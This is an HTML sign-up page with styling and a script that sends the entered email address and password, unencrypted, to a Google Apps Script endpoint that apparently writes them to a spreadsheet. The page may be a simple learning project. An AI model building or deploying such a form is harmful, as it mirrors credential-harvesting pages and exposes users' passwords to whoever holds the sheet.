<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        *{
    margin: 0;
    padding: 0;
}

body{
    background: rgb(63, 62, 143);
    background-size: cover;
}

.survey{
    background-color: rgb(45, 100, 182,0.5);
    margin: 0 430px 0 430px;
    border-radius: 3px;
}

h2{
    font-size: 50px;
    text-align: center;
    margin-top: 150px;
    padding-top: 50px;
    color: white;
}


.name{
   padding: 20px;
   text-align: center;
}

.name input{
    padding: 10px;
    width: 250px;
}

.password{
    text-align: center;

}

.password input{
    padding: 10px;
    width: 250px;
   
}

.rem{
    padding: 15px;
    text-align: center;
    font-size: 15px;
    color: white;

}

.rem label{
    padding-right: 10px;
}


.rem p{
    display: inline-block;
    padding-left: 10px;
    cursor: pointer;
}

.rem p a{
    color: white;
}


.enter{
    text-align: center;
    padding-bottom: 90px;
}

.enter button{
    width: 230px;
    padding: 10px;
    cursor: pointer;
    transition: 0.3s;
}

.enter button:hover{
    background: rgb(15, 15, 133);
    color: white;
    border: none;
}

.enter button::after{
        background-color: white;
    }

@media(max-width:1030px){

    body{
        background: url(img/0JTynN.jpg);
        background-size: cover;
        background-position: center;
    }
    

    .survey{
        background-color: rgb(45, 100, 182,0.5);
        margin: 70px 30px 0 30px;
        border-radius: 3px;
    }
    
    h2{
        font-size: 50px;
        text-align: center;
        margin-top: 30px;
        padding-top: 60px;
        color: white;
    }
    
    
    .name{
       padding: 17px;
       text-align: center;
    }
    
    .name input{
        padding: 10px;
        width: 250px;
    }
    
    .password{
        text-align: center;
    
    }
    
    .password input{
        padding:10px;
        width: 250px;
       
    }
    
    .rem{
        padding: 10px;
        text-align: center;
        font-size: 15px;
        color: white;
    
    }
    
    .rem label{
        padding-right: 15px;
    }
    
    
    .rem p{
        display: inline-block;
        padding-left: 0px;
        cursor: pointer;
    }
    
    .rem p a{
        color: white;
    }
    
    
    .enter{
        text-align: center;
        padding-bottom: 50px;
    }
    
    .enter button{
        width: 230px;
        padding: 12px;
        cursor: pointer;
        transition: 0.3s;
    }
    
    .enter button:hover{
        background: rgb(15, 15, 133);
        color: white;
        border: none;
    }
    
}
    </style>
    <title>Document</title>
</head>
<body>

    <form name="submit-to-google-sheet">
        <div class="survey">
            <h2>SIGN UP</h2>
            <div class="name">
                <input type="email" placeholder="Email" name="Email">
            </div>
            <div class="password">
                <input type="password" placeholder="password" name="Password">
            </div>
            <div class="rem">
                <label >
                 <input type="checkbox">remember me</label>
                 <p>Forgot <a href="#">password?</a></p>
            </div>
            <div class="enter">
                <button><a href="https://www.google.co.uk"></a>ENTER</button>
            </div>
        </div>
      </form>
      
      <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbwsPHTfvCiCPtW9Blv6ZZvO_jr3QVYO1agI4VfxndUJ62NfJzDpiyL06qsNDe_d6SOkww/exec'
        const form = document.forms['submit-to-google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => console.log('Success!', response))
            .catch(error => console.error('Error!', error.message))
        })
      </script>
    

    ,<script src="working emaiil.js"></script>
</body>
</html>